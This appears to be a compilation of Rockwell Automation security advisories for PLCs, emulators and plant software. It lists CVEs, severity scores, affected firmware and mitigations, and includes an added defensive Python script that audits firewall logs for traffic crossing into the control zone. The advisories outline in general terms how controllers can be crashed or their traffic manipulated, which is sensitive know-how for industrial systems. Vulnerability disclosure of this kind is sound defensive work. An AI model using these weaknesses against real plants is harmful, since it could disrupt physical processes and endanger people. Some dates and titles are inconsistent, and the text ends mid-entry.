High
PN1613 | Product Notice 1613: Logix Controllers Vulnerable to a Denial-of-Service Vulnerability
Published Date:
January 25, 2023
Last Updated:
January 25, 2023
CVE IDs:
CVE-2022-3157
Products:
1756-L71S, Standard Controllers, 1756-L72S, 1756-L73S, 1769 CompactLogix 5370
CVSS Scores:
8.6
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No

Revision History
Revision Number
1.2
Revision History
Version 1.0 – December 15, 2022
Version 1.1 – January 17, 2022 – Updated risk mitigation section
Version 1.2 – January 25, 2023 – Updated risk mitigation section

Executive Summary

Rockwell Automation was made aware of a denial-of-service vulnerability that impacts several versions of our GuardLogix® and ControlLogix® controllers. Exploitation of this vulnerability could potentially lead to degradation in availability of the controller and/or a possible major non-recoverable fault (MNRF).

Customers using affected software versions are encouraged to evaluate the mitigations and apply them where appropriate. Additional details relating to the discovered vulnerability, including the products in scope, impact, and recommended countermeasures, are provided. We have not received any notice of this vulnerability being exploited in Rockwell Automation products.

Affected Products

  • CompactLogix™ 5370
  • Compact GuardLogix 5370
  • ControlLogix 5570
  • ControlLogix 5570 redundancy
  • GuardLogix 5570

Vulnerability Details

CVE-2022-3157 Controllers vulnerable to Denial-of-Service Condition
A vulnerability exists in the Rockwell Automation controllers that allows a malformed CIP™ request to cause a major non-recoverable fault (MNRF) and a denial-of-service (DoS) condition.

CVSS Base Score:  8.6/10 (High)
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H

Risk Mitigation & User Action

This vulnerability has been addressed in newer versions of the products. Customers are also directed towards the risk mitigations and are encouraged, when possible, to combine these with QA43240 - Recommended Security Guidelines from Rockwell Automation to employ multiple strategies simultaneously.

Products Affected: CompactLogix 5370, ControlLogix 5570, GuardLogix 5570
First Known Version Affected: 20.011
Corrected In:
  • 33.013
  • 34.011 and later

Products Affected: Compact GuardLogix 5370
First Known Version Affected: 28.011
Corrected In:
  • 33.013
  • 34.011 and later

Products Affected: ControlLogix 5570 Redundancy
First Known Version Affected: 20.054
Corrected In:
  • 33.052
  • 34.051 and later

Reference

  • CVE-2022-3157

High
PN1614 | Studio 5000 Logix Emulate Vulnerable to an SMB Insecure Configuration Vulnerability
Published Date:
December 22, 2022
Last Updated:
December 22, 2022
CVE IDs:
CVE-2022-3156
Products:
RSLogix Emulate 5000 / Studio 5000 Logix Emulate
CVSS Scores:
7.8
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No

Revision History
Revision Number
1.0
Revision History
Version 1.0 – December 22, 2022

Executive Summary

Rockwell Automation was made aware of a misconfiguration vulnerability that affects Studio 5000® Logix Emulate™. Exploitation of this vulnerability could potentially allow a malicious user to perform a remote code execution that could impact the confidentiality, integrity and availability of the software.

Customers using affected versions of this software are encouraged to evaluate the following mitigations and apply them where appropriate. Additional details relating to the discovered vulnerability, including the products in scope, impact and recommended countermeasures, are provided. We have not received any notice of this vulnerability being exploited in Rockwell Automation products.

Affected Products

Studio 5000 Logix Emulate v.20 – 33

Vulnerability Details

CVE-2022-3156 Studio 5000 Logix Emulate SMB™ misconfiguration vulnerability
Users are granted elevated permissions on select product services. Due to this misconfiguration, a malicious user could potentially achieve remote code execution on the targeted software.

CVSS Base Score:  7.8/10 (High)
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Risk Mitigation & User Action

This vulnerability has been addressed in newer versions of the products. Customers are also directed towards the risk mitigations provided and are encouraged, when possible, to combine these with QA43240 - Recommended Security Guidelines from Rockwell Automation to employ multiple strategies simultaneously.
Vulnerabilities Product Suggested Actions
CVE-2022-3156 Studio 5000 Logix Emulate Customers should upgrade to version 34.00 or later to mitigate this issue.

References

  • CVE-2022-3156
  • PN1354 - Industrial Security Advisory Index

High
PN1611 | MicroLogix 1100 and 1400 Product Web Server Application Vulnerable to Denial-Of-Service Condition Attack
Published Date:
December 13, 2022
Last Updated:
October 16, 2024
Products:
1763 MicroLogix 1100, 1766 MicroLogix 1400
CVSS Scores (v3.1):
7.5
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
Yes

Revision History
Revision Number
1.0
Revision History
Version 1.0 – December 13, 2022

Executive Summary

Rockwell Automation received a vulnerability report from security researchers at Veermata Jijabai Technological Institute (VJTI). If exploited, this vulnerability could cause a denial-of-service condition in the web server application on the targeted device.

Customers using affected versions of this software are encouraged to evaluate the mitigations provided below and apply them where appropriate. Additional details relating to the discovered vulnerability, including the products in scope, impact, and recommended countermeasures, are provided below. We have not received any notice of this vulnerability being exploited in Rockwell Automation products.

Affected Products

  • MicroLogix™ 1400 B/C v. 21.007 and below
  • MicroLogix™ 1400 A v. 7.000 and below
  • MicroLogix™ 1100 all versions

Vulnerability Details

Rockwell Automation was made aware that the web server of the MicroLogix 1400 B PLC contains a vulnerability that may lead to a denial-of-service condition. The vulnerability could be exploited by an attacker with network access to the affected systems by sending TCP packets to the web server and closing the connection abruptly, which would cause a denial-of-service condition for the web server application on the device.

(CVE-2022-3166) MicroLogix Controllers Vulnerable to Clickjacking Attack
CVSS Base Score: 7.5/10 (High)
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Risk Mitigation & User Action

Customers using the affected software are encouraged to implement the risk mitigations below to minimize the risk of this vulnerability. Additionally, we encourage customers to combine the risk mitigations with security best practices, also provided below, to deploy a defense-in-depth strategy.
  • Disable the web server, if possible (this component is an optional feature, and disabling it will not disrupt the intended use of the device).
  • Configure firewalls to disallow network communication through HTTP/Port 80.
  • Upgrade to the MicroLogix 800 or MicroLogix 850, as these devices do not have the web server component.
If applying the mitigations noted above is not possible, please see our Knowledgebase article QA43240 - Security Best Practices for additional recommendations to maintain the security posture of your environment.
 
Additional Resources
  • CVE-2022-3166 JSON

 

High
PN1612 | MicroLogix 1100 and 1400 Web Server Application Vulnerable to Cross Site Scripting Attack
Published Date:
December 13, 2022
Last Updated:
October 16, 2024
Products:
1763 MicroLogix 1100, 1766 MicroLogix 1400
CVSS Scores (v3.1):
8.2
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
Yes

Revision History
Revision Number
1.0
Revision History
Version 1.0 – December 13, 2022

Executive Summary

Rockwell Automation received a vulnerability report from a security researcher from Georgia Institute of Technology. If exploited, this vulnerability could allow an attacker to submit remote code in the web server application on the targeted device.

Customers using affected versions of this software are encouraged to evaluate the mitigations provided below and apply them where appropriate. Additional details relating to the discovered vulnerability, including the products in scope, impact, and recommended countermeasures, are provided below. We have not received any notice of this vulnerability previously being exploited in Rockwell Automation products.

Affected Products

  • MicroLogix™ 1400 B/C v. 21.007 and below
  • MicroLogix™ 1400 A v. 7.000 and below
  • MicroLogix™ 1100 all versions

Vulnerability Details

Rockwell Automation was made aware that the MicroLogix 1100 and 1400 controllers contain a vulnerability that may give an attacker the ability to accomplish remote code execution. The vulnerability is an unauthenticated stored cross-site scripting vulnerability in the embedded web server. The payload is transferred to the controller over SNMP and is rendered on the homepage of the embedded website.

(CVE-2022-46670) MicroLogix Controllers Vulnerable to Cross-Site Scripting Attack
CVSS Base Score: 8.2/10 (High)
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L

Risk Mitigation & User Action

Customers using the affected software are encouraged to implement the risk mitigations below to minimize the risk of this vulnerability. Additionally, we encourage customers to combine the risk mitigations with security best practices, also provided below, to deploy a defense-in-depth strategy.
  • Disable the web server, if possible (this component is an optional feature, and disabling it will not disrupt the intended use of the device).
  • Configure firewalls to disallow network communication through HTTP/Port 80.
  • Upgrade to the Micro800 family, as these devices do not have the web server component.

If applying the mitigations noted above is not possible, please see our Knowledgebase article QA43240 - Security Best Practices for additional recommendations to maintain the security posture of your environment.
 
Additional Resources
  • CVE-2022-46670 JSON

 

High
PN1609 | Logix Controllers Vulnerable to Denial-of-Service Attack
Published Date:
December 06, 2022
Last Updated:
October 16, 2024
CVE IDs:
CVE-2022-3752
Products:
1756-L83ES, Standard Controllers, 1756-L84ES, 1756-L81ES, 5069 CompactLogix, 1756-L82ES, 5069 Compact GuardLogix 5380
CVSS Scores (v3.1):
8.6
Known Exploited Vulnerability (KEV):
No
Corrected:
Yes
Workaround:
No

Revision History
Revision Number
1.0
Revision History
Version 1.0 – December 6, 2022

Executive Summary

Rockwell Automation discovered a vulnerability within our Logix Controllers. This vulnerability may allow an unauthorized user to cause a denial of service on a targeted device. Customers using affected versions of this firmware are encouraged to evaluate the following mitigations provided and apply them to their deployed products. Additional details relating to the discovered vulnerability, including affected products and recommended countermeasures, are provided in this security advisory.

Affected Products

  • CompactLogix 5380 controllers
  • Compact GuardLogix® 5380 controllers
  • CompactLogix 5480 controllers
  • ControlLogix 5580 controllers
  • GuardLogix 5580 controllers

Vulnerability Details

CVE-2022-3752 Rockwell Automation Logix Controllers are Vulnerable to a Denial-of-Service Attack
An unauthorized user could use a specially crafted sequence of EtherNet/IP messages, combined with heavy traffic loading, to cause a denial-of-service condition resulting in a major non-recoverable fault. If the target device becomes unavailable, a user would have to clear the fault and redownload the user project file to bring the device back online and continue normal operation.

CVSS v3.1 Base Score: 8.6/10[HIGH]
CVSS v3.1 Vector: AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H

Risk Mitigation & User Action

Customers using the products in scope are encouraged to evaluate the mitigations provided below and apply the appropriate mitigations to their deployed products.
Products Affected: CompactLogix 5380, Compact GuardLogix 5380, ControlLogix 5580, GuardLogix 5580
First Known Version Affected: This vulnerability is present in firmware version 31.011 and later.
Corrected In: This issue has been mitigated in the following firmware versions:
  • 32.016 and later for versions 32
  • 33.015 and later for versions 33
  • 34.011 and later
Customers should upgrade to a version listed above to mitigate this vulnerability.

Products Affected: CompactLogix 5480
First Known Version Affected: This vulnerability is present in firmware version 32.011 and later.

General Security Guidelines

General security guidelines can be found in QA43240 - Recommended Security Guidelines Article in our Knowledgebase.

Requests for additional information can be sent to the PSIRT Inbox (PSIRT@rockwellautomation.com).

ADDITIONAL LINKS

  • PN1354 - Industrial Security Advisory Index
  • CVE-2022-3752 JSON

 

Medium
PN1608 | FactoryTalk Live Data Communication Module Vulnerable to Man-In-The-Middle Attack
Published Date:
December 01, 2022
Last Updated:
October 16, 2024
Products:
LiveData
CVSS Scores (v3.1):
5.9
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
Yes

Revision History
Revision Number
1.0
Revision History
Version 1.0 – December 1, 2022

Executive Summary

Rockwell Automation received a report from Guidepoint Security regarding a security vulnerability discovered within the FactoryTalk® Live Data Communication Module contained within the FactoryTalk Services Platform. Due to the use of a cleartext protocol in this module, malicious actors could conduct Address Resolution Protocol spoofing resulting in loss of integrity of the traffic. This could allow the attacker to view and modify unauthorized packets and potentially deceive the user into seeing false data on the human machine interface.

Customers using affected versions of this software are encouraged to evaluate the mitigations provided below and apply the appropriate mitigations to their deployed products. Additional details relating to the issue, including affected products and recommended countermeasures, are provided.

Affected Products

FactoryTalk LiveData Communication Module (Contained within FactoryTalk Services Platform) - All versions

Vulnerability Details

FactoryTalk LiveData Communication Module vulnerable to man-in-the-middle attack
An unauthenticated attacker with network access can accomplish a man-in-the-middle attack utilizing the clear text protocol of the FactoryTalk LiveData Communication Module and modify traffic, leading to a complete loss of integrity for the products affected by the vulnerability. This condition could result in the operator at the human machine interface seeing manipulated data on the screen, potentially breaking the integrity of the data that is seen.

CVSS v3.1 Base Score: 5.9/10[MEDIUM]
CVSS v3.1 Vector: AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:H/A:N

Risk Mitigation & User Action

Customers using the affected software are encouraged to set up the secondary mitigation described below, which addresses the associated risk. Customers are also directed towards the general risk mitigation strategies provided in QA43240 - Recommended Security Guidelines from Rockwell Automation in our Knowledgebase.

Suggested Actions

Customers should set up IPsec to mitigate this issue, as detailed in the QA46277 - Deploying FactoryTalk Software with IPsec Knowledgebase article.

General Security Guidelines

If customers are unable to implement IPsec, it is recommended that the below guidelines be adhered to as they provide strong mitigations against this type of attack.

Network-based Vulnerability Mitigations for Embedded Products
  • Utilize proper network infrastructure controls to help ensure that unused or unnecessary protocols from unauthorized sources are blocked. For more information on TCP/UDP ports and protocols used by Rockwell Automation Products, see Knowledgebase Article BF7490 - TCP/UDP Ports Used by Rockwell Automation Products.
  • Locate control system networks and devices behind firewalls and isolate them from the business network.
  • Consult the product documentation for specific features (e.g., hardware keyswitch settings) that may be used to block unauthorized changes.
  • Block all traffic to EtherNet/IP or other CIP protocol-based devices from outside the Manufacturing Zone by blocking or restricting access to TCP and UDP Port# 2222 and Port# 44818 using proper network infrastructure controls, such as firewalls, UTM devices, or other security appliances.

General security guidelines can be found in the QA43240 - Recommended Security Guidelines from Rockwell Automation in our Knowledgebase.

Requests for additional information can be sent to the PSIRT Inbox (PSIRT@rockwellautomation.com).

Additional Links

  • PN1354 - Industrial Security Advisory Index

 

Critical
PN1576 | FactoryTalk® Activation Manager and Studio 5000 Logix Designer® contain Wibu CodeMeter vulnerabilities
Published Date:
November 17, 2022
Last Updated:
November 17, 2022
CVE IDs:
CVE-2021-20094, CVE-2021-20093, CVE-2021-41057
Products:
FactoryTalk Activation, RSLogix 5000 / Studio 5000 Logix Designer
CVSS Scores:
7.5, 9.1
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No

Revision History
Revision Number
3.0
Revision History
Version 1.0 – August 6, 2021
Version 2.0 – August 11, 2021 – Removed modified score
Version 3.0 – November 22, 2022

Executive Summary

Rockwell Automation is impacted by advisory ICSA-21-210-02, which contains two vulnerabilities targeting Wibu-Systems AG. These vulnerabilities impact FactoryTalk® Activation Manager and Studio 5000 Logix Designer®. If successfully exploited, these vulnerabilities may allow the reading of data from the heap of the CodeMeter Runtime network server or result in a crash of the CodeMeter Runtime Server (i.e., CodeMeter.exe).

Customers using affected versions of this software are encouraged to evaluate the mitigations provided below and apply the appropriate mitigations to their deployed products. Additional details relating to the discovered vulnerability, including affected products and recommended countermeasures, are provided herein.

Affected Products

  • FactoryTalk® Activation Manager v4.00 to v4.05.02
    • Includes Wibu-Systems AG CodeMeter v7.20a and earlier
  • Studio 5000 Logix Designer® v23.00.01 to v33.00.02

Vulnerability Details

CVE-2021-20093: CWE-126

FactoryTalk Activation Manager and Studio 5000 Logix Designer: An issue exists in the Wibu-Systems AG CodeMeter Runtime that allows a remote, unauthenticated attacker to send a specially crafted packet, which could result in crashing the server or direct the CodeMeter Runtime Network Server to send back packets containing data from the heap.


Wibu-Systems AG score:

CVSS v3.1 Base Score: 9.1/10 Critical
CVSS v3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H

CVE-2021-20094: CWE-126

FactoryTalk Activation Manager and Studio 5000 Logix Designer: An issue exists in the Wibu-Systems CodeMeter Runtime that allows a remote, unauthenticated attacker to send a specially crafted packet, which could result in crashing the server or direct the CodeMeter Runtime CmWAN server to send back packets containing data from the heap.

Wibu-Systems AG score:

CVSS v3.1 Base Score: 7.5/10 HIGH
CVSS v3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

-------------------UPDATE: 22 Nov 2022----------------------

CVE-2021-41057: CWE-269

A local attacker could cause a Denial of Service by overwriting existing files on the affected system.

Wibu-Systems AG Score:
CVSS v3.1 Base Score: 7.1/10 HIGH
CVSS v3.1 Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H

Risk Mitigation & User Action

Customers using the affected FactoryTalk® Activation Manager and/or Studio 5000 Logix Designer® are encouraged to update to an available software revision that addresses the associated risk. Customers who are unable to update are directed towards risk mitigation strategies provided below, and are encouraged, when possible, to combine these with the general security guidelines to employ multiple strategies simultaneously.
Vulnerability Suggested Actions
CVE-2021-20093 Update to FactoryTalk Activation Manager 4.05.03 or later
For compatibility details about FactoryTalk Activation Manager, customers can consult the Product Compatibility and Download Center, Standard Views -> Software Latest Versions -> FactoryTalk Activation
CVE-2021-20094 Update to FactoryTalk Activation Manager 4.05.03 or later
CVE-2021-41057 Update to FactoryTalk Activation Manager 4.06.11 or later

Customers may update Wibu-Systems CodeMeter independently for FactoryTalk Activation Manager or Studio 5000 Logix Designer® by installing Wibu-Systems CodeMeter AG v7.30a. Please refer to this support page to determine if Wibu-Systems CodeMeter AG v7.30a is compatible with the installed versions of Rockwell Automation software.

During installation, Rockwell Automation products bind CodeMeter Runtime to the Local Host adapter, and the Network Server and CmWAN Server ports are disabled. Therefore, if the default installation is not modified, Rockwell Automation software is not susceptible to these vulnerabilities over a network connection. Default port 22350 is required if activation licenses are hosted from the machine.

Customers using the affected software are directed towards risk mitigation. They are encouraged, when possible, to combine this guidance with the general security guidelines for a comprehensive defense in depth strategy.

General Security Guidelines

  • Utilize proper network infrastructure controls, such as firewalls, to help ensure that Wibu CodeMeter Network Server and CmWAN Server (Default Port# 22350/TCP and 22351/TCP) are blocked from unauthorized sources.
  • Run all software as User, not as an Administrator, to minimize the impact of malicious code on the infected system.
  • Use of Microsoft AppLocker or a similar application allow-listing tool can help mitigate risk. Information on using AppLocker with Rockwell Automation products is available at Knowledgebase Article QA17329 - Using Rockwell Automation Software Products with AppLocker.
  • Ensure that the least-privilege user principle is followed, and user/service account access to shared resources (such as a database) is only granted with a minimum number of rights as needed.
  • Use trusted software, software patches, antivirus/antimalware programs and interact only with trusted web sites and attachments.
  • When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.
  • Block all traffic to EtherNet/IP™ or other CIP™ protocol-based devices from outside the Manufacturing Zone by blocking or restricting access to UDP Port# 2222 (CIP), TCP/UDP Port# 44818 (CIP), and TCP/UDP Port# 2221 (CIP Security) using proper network infrastructure controls, such as firewalls, UTM devices, or other security appliances. For more information on TCP/UDP ports used by Rockwell Automation Products, see Knowledgebase Article BF7490 - TCP/UDP Ports Used by Rockwell Automation Products.
  • Minimize network exposure for all control system devices and/or systems and ensure that they are not accessible from the Internet. For further information about the risks of unprotected Internet-accessible control systems, please see Knowledgebase Article PN715 - Advisory on web search tools that identify ICS devices and systems connected to the Internet.
  • Locate control system networks and devices behind firewalls and isolate them from the business network.
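
The port-blocking guidance in this list (CIP on UDP 2222, TCP/UDP 44818 and TCP/UDP 2221), in the Network-based Vulnerability Mitigations of PN1608, the HTTP/Port 80 guidance in the MicroLogix and GoAhead advisories, and the CodeMeter note above (Network Server and CmWAN Server on 22350/TCP and 22351/TCP) can be checked after the fact against firewall connection logs. The audit script below is an added example and is not Rockwell Automation code: it assumes a key=value connection-log format and a Manufacturing Zone of 10.10.0.0/16, both constructed for this example, and reports every allowed flow that enters the zone from outside on one of those ports, which is exactly the traffic the guidance says should have been blocked at the zone boundary.

```python
"""Zone-boundary traffic audit (added example; not Rockwell Automation code).

Checks firewall connection records for flows that reach devices inside the
Manufacturing Zone from outside it on the ports the guidance above says to
block: CIP/EtherNet/IP (TCP and UDP 2222 and 44818, TCP and UDP 2221 for CIP
Security), the embedded web server (TCP 80) and the CodeMeter Network Server
and CmWAN Server (TCP 22350 and 22351). The zone address ranges and the
key=value log format are assumptions made for this example.
"""
import ipaddress
import re

# Assumed Manufacturing Zone address space; replace with the real cell/area-zone subnets.
MANUFACTURING_ZONE = [ipaddress.ip_network("10.10.0.0/16")]

# (protocol, destination port) -> service, from the port guidance in these advisories.
WATCHED_PORTS = {
    ("tcp", 2222): "CIP (EtherNet/IP)",
    ("udp", 2222): "CIP (EtherNet/IP)",
    ("tcp", 44818): "CIP (EtherNet/IP)",
    ("udp", 44818): "CIP (EtherNet/IP)",
    ("tcp", 2221): "CIP Security",
    ("udp", 2221): "CIP Security",
    ("tcp", 80): "embedded web server (HTTP)",
    ("tcp", 22350): "CodeMeter Network Server",
    ("tcp", 22351): "CodeMeter CmWAN Server",
}

# Constructed sample records in an assumed key=value firewall log format.
SAMPLE_LOG = [
    "2024-05-01T08:00:01Z proto=tcp src=10.10.1.50 sport=50001 dst=10.10.1.5 dport=44818 action=allow",
    "2024-05-01T08:00:02Z proto=tcp src=192.168.100.20 sport=50002 dst=10.10.1.5 dport=44818 action=allow",
    "2024-05-01T08:00:03Z proto=udp src=192.168.100.20 sport=50003 dst=10.10.1.5 dport=2222 action=deny",
    "2024-05-01T08:00:04Z proto=tcp src=172.16.4.9 sport=50004 dst=10.10.2.7 dport=80 action=allow",
    "2024-05-01T08:00:05Z proto=tcp src=192.168.100.31 sport=50005 dst=10.10.3.10 dport=22350 action=allow",
    "2024-05-01T08:00:06Z proto=tcp src=192.168.100.31 sport=50006 dst=10.10.3.10 dport=443 action=allow",
    "2024-05-01T08:00:07Z proto=tcp src=10.10.1.5 sport=44818 dst=192.168.100.20 dport=44818 action=allow",
    "this line is not a connection record",
]

_FIELD = re.compile(r"(\w+)=(\S+)")


def parse_record(line):
    """Parse one record into a dict, or return None if it is not a usable record."""
    fields = dict(_FIELD.findall(line))
    try:
        return {
            "proto": fields["proto"].lower(),
            "src": ipaddress.ip_address(fields["src"]),
            "dst": ipaddress.ip_address(fields["dst"]),
            "dport": int(fields["dport"]),
            # A record without an action is treated as allowed so that it is reviewed.
            "action": fields.get("action", "allow").lower(),
        }
    except (KeyError, ValueError):
        return None  # malformed or unrelated line: skip instead of aborting the audit


def in_zone(addr, zone=MANUFACTURING_ZONE):
    """True if the address lies inside one of the Manufacturing Zone networks."""
    return any(addr in net for net in zone)


def audit(lines, zone=MANUFACTURING_ZONE):
    """Return one finding per allowed flow entering the zone on a watched port.

    Outbound flows from the zone and intra-zone flows are not reported; the
    guidance concerns traffic reaching CIP, HTTP and CodeMeter services from
    outside the Manufacturing Zone.
    """
    findings = []
    for line in lines:
        rec = parse_record(line)
        if rec is None or rec["action"] != "allow":
            continue
        service = WATCHED_PORTS.get((rec["proto"], rec["dport"]))
        if service and in_zone(rec["dst"], zone) and not in_zone(rec["src"], zone):
            findings.append({
                "src": str(rec["src"]), "dst": str(rec["dst"]),
                "proto": rec["proto"], "dport": rec["dport"], "service": service,
            })
    return findings


if __name__ == "__main__":
    for f in audit(SAMPLE_LOG):
        print(f"{f['src']} -> {f['dst']} {f['proto']}/{f['dport']} "
              f"({f['service']}) crossed the zone boundary")
```

On the constructed sample, three flows are reported: CIP explicit messaging on 44818 from an enterprise address, HTTP to a device web server, and a CodeMeter Network Server connection; the denied UDP 2222 attempt, the HTTPS flow and the outbound flow from a zone device are not. Any finding means the boundary firewall is not enforcing the policy the advisories describe and the rule set should be reviewed.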

For further information on the Vulnerability Handling Process for Rockwell Automation, please refer to our Product Security Incident Response FAQ document.

Refer to our Industrial Network Architectures Page for comprehensive information about implementing validated architectures designed to complement security solutions.

See the Network Services Overview Page for information on network and security services for Rockwell Automation to enable assessment, design, implementation and management of validated, secure network architectures.

We also recommend that concerned customers continue to monitor this advisory by subscribing to PSA/PN/Security Notifications. This can be done by updating settings in Account Overview within the Knowledgebase.

Rockwell Automation remains committed to making security enhancements to our systems in the future. For more information and for assistance with assessing the state of security of your existing control system, including improving your system-level security when using Rockwell Automation and other vendor controls products, you can visit the Rockwell Automation Security Solutions web site.

Requests for additional information can be sent to the RASecure Inbox (rasecure@ra.rockwell.com).

ADDITIONAL LINKS

  • PN1354 - Industrial Security Advisory Index
  • Industrial Firewalls within a CPwE Architecture
  • Deploying Industrial Firewalls within a CPwE Architecture Design and Implementation Guide
  • ICSA-21-210-02

Critical
PN1508 | Treck Ripple20 TCP/IP Vulnerabilities Affect Multiple Rockwell Automation Products
Published Date:
November 01, 2022
Last Updated:
November 20, 2024
CVE IDs:
CVE-2020-11914, CVE-2020-11910, CVE-2020-11901, CVE-2020-11907, CVE-2020-11911, CVE-2020-11912, CVE-2020-25066, CVE-2020-11906
Products:
Flex I/O, 1408 PowerMonitor 1000, 1732E ArmorBlock I/O, 1426 PowerMonitor 5000
CVSS Scores (v3.1):
9.8, 9.1, 5.0, 3.7, 3.1
Known Exploited Vulnerability (KEV):
No
Corrected:
Yes
Workaround:
Yes

Revision Number

6.0

Revision History
Version 6.0 – August 13, 2024. Updated affected products list and user actions.
Version 5.0 – November 1, 2022. Added patch information for additional products.
Version 4.0 – May 17, 2022. Updated patch information for PowerFlex 755T and 6000T.
Version 3.0 – February 9, 2021. Updated for ICSA-20-353-01.
Version 2.1 – January 13, 2021. Updated to reflect additional disclosure.
Version 2.0 – July 15, 2020. Updated table to reflect affected products and versions.
Version 1.0 – June 16, 2020. Initial Release.

Executive Summary

Treck, a real-time embedded Internet Protocol software vendor, reported several vulnerabilities (named "Ripple20") to Rockwell Automation that were discovered by security researchers at JSOF, a security vendor and research organization. The embedded TCP/IP stack (versions earlier than 6.0.1.66) from Treck is used by many different technology vendors including Rockwell Automation. These vulnerabilities, if successfully exploited, may result in remote code execution, denial-of-service, or sensitive information disclosure.

Begin Update 3.0
On December 18, 2020, Treck reported four additional vulnerabilities that were discovered by security researchers at Intel. The following components of the embedded TCP/IP stack (versions 6.0.1.67 and prior) are affected: HTTP Server, IPv6, and DHCPv6. These vulnerabilities, if successfully exploited, may result in denial-of-service conditions or remote code execution.
End Update 3.0

Since this disclosure is part of a large multi-party coordination effort with the CERT/CC and ICS-CERT, not every vulnerability reported by Treck impacts Rockwell Automation. Please see the table under Affected Products for a full list of the affected Rockwell Automation products and the corresponding CVE IDs.

Customers using affected products are encouraged to evaluate their own systems and apply the appropriate risk mitigations from those listed below. Additional details relating to the discovered vulnerabilities and recommended countermeasures are provided herein.

Affected Products

Affected Product Family | Affected Versions | CVE IDs
5094-AEN2SFPR/XT, 5094-AEN2TR/XT, 5094-AENSFPR/XT, 5094-AENTR/XT | 1.011-4.011 | CVE-2020-11901, CVE-2020-11906, CVE-2020-11907, CVE-2020-11910, CVE-2020-11911, CVE-2020-11912
5069-AENTR | 3.011-4.011 | CVE-2020-11901, CVE-2020-11906, CVE-2020-11907, CVE-2020-11910, CVE-2020-11911, CVE-2020-11912
1734-AENT/R | 4.001-6.012 | CVE-2020-11901, CVE-2020-11906, CVE-2020-11907, CVE-2020-11910, CVE-2020-11911, CVE-2020-11912
1738-AENT/R | 4.001-6.012 | CVE-2020-11901, CVE-2020-11906, CVE-2020-11907, CVE-2020-11910, CVE-2020-11911, CVE-2020-11912
1732E-16CFGM12R, 1732E-8X8M12DR, 1732E-IB16M12DR, 1732E-IB16M12R, 1732E-OB16M12DR, 1732E-OB16M12R | 2.011-2.012 | CVE-2020-11901, CVE-2020-11906, CVE-2020-11907, CVE-2020-11910, CVE-2020-11911, CVE-2020-11912
1791ES-ID2SSIR | 1.001 | (none marked)
1799ER-IQ10XOQ10 | 2.011 | CVE-2020-11901, CVE-2020-11906, CVE-2020-11907, CVE-2020-11910, CVE-2020-11911, CVE-2020-11912
1794-AENTR/XT | 1.011-1.017 | CVE-2020-11901, CVE-2020-11906, CVE-2020-11907, CVE-2020-11910, CVE-2020-11911, CVE-2020-11912
1732E-12X4M12QCDR, 1732E-16CFGM12QCR, 1732E-16CFGM12QCWR, 1732E-12X4M12P5QCDR, 1732E-16CFGM12P5QCR | 1.011-1.015 | CVE-2020-11901, CVE-2020-11906, CVE-2020-11907, CVE-2020-11910, CVE-2020-11911, CVE-2020-11912
1732E-16CFGM12P5QCWR | 1.011-2.011 | CVE-2020-11901, CVE-2020-11906, CVE-2020-11907, CVE-2020-11910, CVE-2020-11911, CVE-2020-11912
PowerMonitor™ 5000 | 4.19 | CVE-2020-11901, CVE-2020-11906, CVE-2020-11907, CVE-2020-11910, CVE-2020-11911, CVE-2020-11912, CVE-2020-11914
PowerMonitor 1000 | 4.10 | CVE-2020-11901, CVE-2020-11906, CVE-2020-11907, CVE-2020-11910, CVE-2020-11911, CVE-2020-11912, CVE-2020-11914
ArmorStart® ST+ Motor Controller | 1.001 | CVE-2020-11901, CVE-2020-11906, CVE-2020-11907, CVE-2020-11910, CVE-2020-11911
Kinetix 5500 | All* | CVE-2020-11901, CVE-2020-11906, CVE-2020-11907, CVE-2020-11910, CVE-2020-11911, CVE-2020-11912
Kinetix® 5700 | All* | CVE-2020-11901, CVE-2020-11906, CVE-2020-11907, CVE-2020-11910, CVE-2020-11911, CVE-2020-11912
Kinetix 5100 | 1.001 | CVE-2020-11901, CVE-2020-11906, CVE-2020-11907, CVE-2020-11910, CVE-2020-11911, CVE-2020-11912
PowerFlex 755T, PowerFlex 6000T | All* | CVE-2020-11901, CVE-2020-11906, CVE-2020-11907, CVE-2020-11910, CVE-2020-11911
CIP Safety™ Encoder | All* | CVE-2020-11901, CVE-2020-11906, CVE-2020-11907, CVE-2020-11910, CVE-2020-11911

Begin Update 3.0:
Affected Product Family | Affected Versions | CVE
1734-AENT/R | 4.001-6.012 | CVE-2020-25066
1738-AENT/R | 4.001-6.012 | CVE-2020-25066
1794-AENTR, 1794-AENTR/XT | 1.011-1.017 | CVE-2020-25066
1732E-16CFGM12R, 1732E-8X8M12DR, 1732E-IB16M12DR, 1732E-IB16M12R, 1732E-OB16M12DR, 1732E-OB16M12R | 2.011-2.012 | CVE-2020-25066
1799ER-IQ10XOQ10 | 2.011 | CVE-2020-25066
1732E-12X4M12QCDR, 1732E-16CFGM12QCR, 1732E-16CFGM12QCWR, 1732E-12X4M12P5QCDR, 1732E-16CFGM12P5QCR | 1.011-1.015 | CVE-2020-25066
1732E-16CFGM12P5QCWR | 1.011-2.011 | CVE-2020-25066
PowerMonitor™ 5000 | 4.19 | CVE-2020-25066
PowerMonitor 1000 | 4.10 | CVE-2020-25066
End Update 3.0

 

Begin Update 6.0
Affected Product Family | Affected Versions | CVE
PowerFlex 527 | all | CVE-2020-25066
End Update 6.0

Vulnerability Details

Begin Update 3.0:
CVE-2020-25066

